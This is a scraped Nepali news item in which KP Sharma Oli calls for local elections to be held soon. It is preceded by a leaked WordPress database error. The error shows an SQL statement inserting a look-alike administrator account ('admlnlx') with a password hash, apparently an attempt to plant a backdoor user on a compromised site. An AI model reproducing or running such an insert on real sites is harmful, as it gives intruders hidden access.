WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRh3P5Auhg7N73YCZIWx4VHefntGJP0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:10:34', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ ८-
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले सत्तापक्षले ढाँटछल गर्न खोजेपनि जसरी पनि चुनाव गर्नुपर्ने बताएका छन्। शनिबार स्थानीय निकाय कमर्चारी संघको अधिवेशन उद्घाटन गर्दै उनले जतिसक्दो छिटो चुनाव घोषणा गर्नुको विकल्प नभएको बताए। ‘छक्कापञ्जा फिल्ममा चल्ला, एमालेसँग चल्दैन। त्यसकारण साफसाफ चुनाव चाहियो’ उनले भने ‘आज चार दलको बैठकमा म यही कुरा भन्छु।’ प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले शनिबार नै एमाले सहित चार दलको बैठक बोलाएका छन्।
स्थानीय तहको चुनाव छिट्टै हुने भन्दै ओलीले कर्मचारीहरु तयारी अवस्थामा बस्नुपर्ने बताए। ‘केही पर धकेल्ने कोशिस त होला तर स्थानीय तहको चुनाव हुन्छ तपाईहरु तयार भएर बस्नुस्’ उनले भने। स्थानीय तहमा निर्वाचनपछि आउने नेतृत्व नयाँ हुने भएकाले धेरै विषय कर्मचारीहरुले सिकाउनुपर्ने अध्यक्ष ओलीले बताए।